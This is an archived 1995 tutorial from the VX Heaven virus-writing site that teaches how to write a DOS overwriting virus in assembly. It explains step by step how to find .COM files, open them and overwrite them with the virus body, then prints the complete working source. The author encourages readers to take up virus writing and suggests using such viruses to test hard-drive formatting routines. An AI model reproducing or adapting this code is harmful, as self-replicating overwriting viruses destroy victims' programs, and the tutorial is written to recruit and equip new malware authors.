VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Overwriting virus tutorial #1

Chiba City Blues [3]
March 1995

[Back to index] [Comments]
	( . .  )
	\     / WARNING: The information contain within here can be
	 \   / ^^^^^^^ dangerous to you mind and computer!!!!!!!!
	  \*/ I assume no responsiblity!!!!!!!!!

Well here it is my first instructional tutorial. I felt it was nesscary for this file since I could not find any tutorials that taught virus writing from the basic overwriting virus. Well that's how I started and now I want to show you. So that you too can have a long and fruitful life of codeing viruses. :)


What is an overwritting virus?

I'm glad you asked that. :) An overwriting virus is a virus that reproduces by overwriting the first parts of a program with itself. Here is an example:

                +-------------------------+        (I got this example from
                |    P R O G R A M        |         40Hex, thanks P/S!!!!)
                | VIRUS! |

                | VIRUS! | G R A M        |

As you can see the first part of the program was overwritten with the virus code. Since important parts of the original program are effectivly destroyed it won't ever run, but the virus code will. As you can guess overwriting viruses are very destructive and not very productive. But you must learn to walk before you can do the Polka!!

So what does one need to know to write an overwriting virus?

Another question I'm glad you asked. :) Well having a basic knowledge in Assembly is a must, but it is not very differcult. As a virus writer, I only know one programing language, Assembly. I didn't even learn BASIC. So don't listen to those that say don't learn Assembly, it's a wonderful programing language. At the end of this file I'll be recomending books and things to do to help ya on your way to Assembly and virus writing.

Well let's get down to codeing!!!! :)

We will be dealing with .Com files. So here is the basic setup for a .Com file in an Assembly source file:

        CODE    SEGMENT
        ASSUME  CS:CODE,DS:CODE         ;in .Com files the data, code, extra
                                        ;and stack segments are all the same.
        ORG     100H                    ;this is where all .Com files start
                                        ;in memory.  This allows room for the

        blah!                           ;all your virus body goes here
        blah!                           ;all your 'db's go here etc..etc...
        END     STARTVX

See the set up isn't really hard to follow, but the lack of info in that example can be confusing. We'll get to a full Virus source code a little later. Now what is the basic setup for a simple overwriting virus? Well let's look at the order of operations:

  1. find a file
  2. open the found file
  3. write the virus to the opened file (infect it)
  4. close the file
  5. exit

Well as you can see there is nothing but pure replication functions in this setup. Well I wanted it to be easy and not to boog you down with encryption, id bytes, etc... We are dealing with ZEN and the art of basic viruses!

Here we go looking at these steps of an simple overwriting virus:


the inputs:

	AH: 4EH

Now let's see how we would put this into our little program:

        mov     ah,4eh                    ;find first service
        mov     cx,0000h                  ;we 0'ed cx for normal files
        mov     dx,offset star_com        ;the file mask for .Com file
                                          ;you'll see
        int     21h
;now of course when you said star_com you need to tell the Assembler what
;you are talking about.  Here it is:

star_com:       db      "*.com",0

;ya see how it will work.  With the use of the wild card '*' the first file
;that has the ending of .com will be found.  This is easy isn't it?

Now you can see that we didn't need to touch DS: since CS=DS=ES=SS. So the Star_com already was in the Data Segment. Yay!!!!! Love em .Com files. Sorry need to get back on track.

Now before we can go on and talk about open a found file for writing to(infecting), we must talk about the Disk Transfer Area (DTA). When you find that first file, information about the file found goes into the DTA, everything from file name to date of creation. Here's the setup:

	0h	db	21 dup(0)	;reserved for DOS uses
	15h	db	00		;file attributes
	16h	dw	0000		;file time
	18h	dw	0000		;file date
	1ah	dd	00000000	;file size
	1eh	db	13 dup(0)	;asciiz of the file name.

That is the layout of the DTA. Now the DTA lies in the PSP. The first 256 (100h) bytes infront of the .Com file. It's address is 80h. Most of the time in virus writing, you would want to move the DTA to a location where you can manipulate it without possbile messing up the PSP. Well for our case, with a simple overwriting virus, we don't need to worry. All we are going to do is read from the DTA, the file name we just have found. Now this is how we will address the file name, now we know that the DTA starts at 80h, and we know that at 1eh from the DTA's begining is the asciiz of the file name. So we just add them together and see what we get, 80h + 1eh = 9eh. Well that is were it's located, now let's move on to the next step.


the inputs:
	AH: 3DH
	AL: 00H ;opened for reading only
	    01H ;opened for writing only
	    02H ;opened for both reading and writing

Now look at it setup in the format we need to know.

	mov	ah,3dh	;open file
	mov	al,02h	;open it for reading and writing
	mov	dx,9eh	;remember this is where the name in the DTA
	int	21h

Now Dos services will return a file handle of the file we just opened. The file handle is nothing more than a number that dos uses to know where it will read from(the file) or write to(the file). We don't want it in AX since the next step that you will see we need it in BX. Here's a easy way to move it:

	xchg	bx,ax	;that will put the file handle into bx in one

Ok now the down and dirty stuff. Infecting the file we just opened. Ha ha!


the inputs:
	AH: 40H

Here we go again with seeing what it will look like:

	mov	ah,40h
	mov	cx,offset endvx - offset startvx;this will find the virus
						;lenth, how many bytes to
	mov	dx,offset startvx		;where the virus starts
	int	21h

Ahhhhhhhhh! I always feel so relaxed after reproducing....ahh.hh...h! Oh...where was I, a...well now that we have copied the virus to the file, now we can close it up.

(4)CLOSE THE FILE! ;Whata-ya live in a barn!

the inputs:
	AX: 3EH

Now before we go on remember how after we opened the file that we put the file handle in BX. So since we didn't mess with BX we should just have to:

	mov	ah,3eh
	int	21h

Now for the final and last step the exiting. Here ya go:


int 20h

Well I know it isn't really pretty, but it works. Well let's look at how all of it fits together:

Code    Segment
        Assume CS:code,DS:code
        Org     100h

startvx proc    near

        mov     ah,4eh
        mov     cx,0000h
        mov     dx,offset star_com
        int     21h

        mov     ah,3dh
        mov     al,02h
        mov     dx,9eh
        int     21h

        xchg    bx,ax

        mov     ah,40h
        mov     cx,offset endvx - offset startvx
        mov     dx,offset startvx
        int     21h

        mov     ah,3eh
        int     21h

        int     20h

startvx endp

star_com:       db      "*.com",0

endvx   label   near

code    ends
        end     startvx


Sorry I didn't put comments in, but that was done so that if you can not read along and follow what is going on. You need to re-read this file, and practice more Assembly.

Now that I know overwriting virus programing what can I use them for?

Another fine question. :) overwriting viruses are simple, and being simple they are fairly easy to follow and program. That in it's self will help educate you in the basics of a virus, writing, reading, find file, etc.... Also since it's fairly easy to write up an overwriting virus you can use them as test platforms for other routines. Formating HD's, visual displays, encryption, etc..... This is so that you can concentrate on the how the test routine will work not the virus.

Now that I have the basics, is that all I need?

OH No, there are many things that you need, the knowledge being the hardest. Read Assembler Inside and Out, and Using Assembly, they're really good books. You need, an Assembler(A86+TASM), lot's of source codes to learn from(some included). It just dosen't stop there, you will need a some really good virus scanners to track what your virus is doing. F-prot and Tbav are great, but if you come up with a virus that is unscannerable they won't work. That's why I highly recommend INVIRCIBLE. It will protect you from real screw ups, track your virus movement, even unscannibles, even protect you from your 'friends' viruses on you computer >:>. It's the best anti-virus protection out there, you need to know your enemy, and it's a powerful tool. The biggest and most important thing you can have is people that are helpful enough to take the time to answer the questions that form in your mind. You will see some of those people in the closing credits of this file. Talk to them.

Now you are on to a long and fruitful life of making your own viruses. Remember pratice, ask questions, read and of course have fun!!!!!!!

Now I would like to take the time to thank a few people:

[Back to index] [Comments]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! aka